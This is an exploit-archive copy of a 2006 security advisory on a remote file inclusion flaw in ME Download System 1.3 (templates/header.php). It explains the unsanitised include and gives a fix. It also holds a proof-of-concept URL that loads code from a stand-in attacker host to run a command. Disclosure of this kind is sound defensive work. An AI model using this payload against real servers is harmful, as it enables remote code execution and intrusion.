Advertisement






ME Download System 1.3 Remote File Inclusion

CVE Category Price Severity
CVE-2007-5466 CWE-98 $500 High
Author Risk Exploitation Type Date
Some Hacker High Remote 2006-08-15
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 0.65 0.89

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080064

Below is a copy:

+--------------------------------------------------------------------

+

+ ME Download System 1.3 Remote File Inclusion

+

+--------------------------------------------------------------------

+

+ Affected Software .: ME Download System 1.3

+ Venedor ...........: http://www.ehmig.net/

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: Philipp Niedziela

+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_282.htm

+ Contact ...........: webmaster[at]bb-pcsecurity[.]de http://www.bb-pcsecurity.de

+ Affected Files ....: templates/header.php

+

+--------------------------------------------------------------------

+

+ Code of /templates/header.php:

+

+ .....

+ <?php

+ include($Vb8878b936c2bd8ae0cab.'/settings_style.php');

+ .....

+

+--------------------------------------------------------------------

+

+ $Vb8878b936c2bd8ae0cab is not properly sanitized before being used

+

+--------------------------------------------------------------------

+

+ Solution:

+ Include config-File in header.php:

+

+--------------------------------------------------------------------

+

+ PoC:

+ http://[target]/templates/header.php?$Vb8878b936c2bd8ae0cab=http://evils
ite.com?cmd=ls

+

+--------------------------------------------------------------------

+

+ Notice:

+ Maybe there are more RFI-Vulns in other files, but it's very hard

+ to read this code.

+

+ Venedor has been contacted, but I didn't received any answer.

+

+--------------------------------------------------------------------

+

+ Greets:

+ Krini Gonzales

+

+-------------------------[ E O F ]----------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum